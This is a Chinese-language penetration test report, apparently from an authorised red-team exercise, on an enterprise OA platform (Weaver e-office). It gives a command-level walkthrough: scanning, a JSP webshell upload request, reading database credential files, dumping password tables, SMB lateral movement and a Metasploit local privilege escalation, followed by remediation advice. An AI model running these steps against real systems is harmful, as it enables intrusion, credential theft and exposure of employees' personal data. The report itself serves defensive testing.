目标系统:某企业内部信息管理平台(Web系统 + 内网资源)
测试授权:企业授权渗透测试,属于红队演练
测试目的:
使用工具:whois
、nslookup
、theHarvester
收集内容:
工具:nmap
+ whatweb
+ FOFA
+ Shodan
发现信息:
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data
file=@payload.jsp
✅ 权限:
www
用户权限,进入Web目录
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
dbuser / dbpass
,进一步连接数据库后台。SELECT username, password FROM user_table;
netstat
、arp -a
、nmap -sP
msf
, CrackMapExec
, Impacket
, smbclient
smbclient //192.168.1.100/share -U "admin"
WinPEAS
, Sherlock
, MSF local_exploit_suggester
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
项目 | 结果 |
---|---|
拿到webshell | ✅ |
获取数据库访问权限 | ✅ |
获得OA系统管理员账户 | ✅ |
横向入侵到文件服务器 | ✅ |
成功提权为System权限 | ✅ |
发现大量员工身份证件、薪资文档等敏感资料 | ✅ |
安全措施 | 建议内容 |
---|---|
漏洞修补 | 尽快升级泛微e-office系统,打补丁 |
Web防护 | WAF防护上传接口,过滤执行脚本 |
内网隔离 | 文件服务器应设置访问策略,不应开放匿名访问 |
权限控制 | 最小权限原则,限制System提权条件 |
日志审计 | 启用webshell行为监控与文件上传审计 |
应急响应 | 建立SOC联动机制,实现告警联动 |
类型 | 工具名称 | 用途 |
---|---|---|
信息收集 | nmap, whatweb, FOFA | 扫描与指纹识别 |
Web攻击 | Burp Suite, curl, sqlmap | 注入与漏洞利用 |
提权工具 | WinPEAS, Metasploit | 本地提权 |
横向移动 | CrackMapExec, Impacket | SMB、NTLM中继 |
后门控制 | msfconsole, Behinder | 维持访问通道 |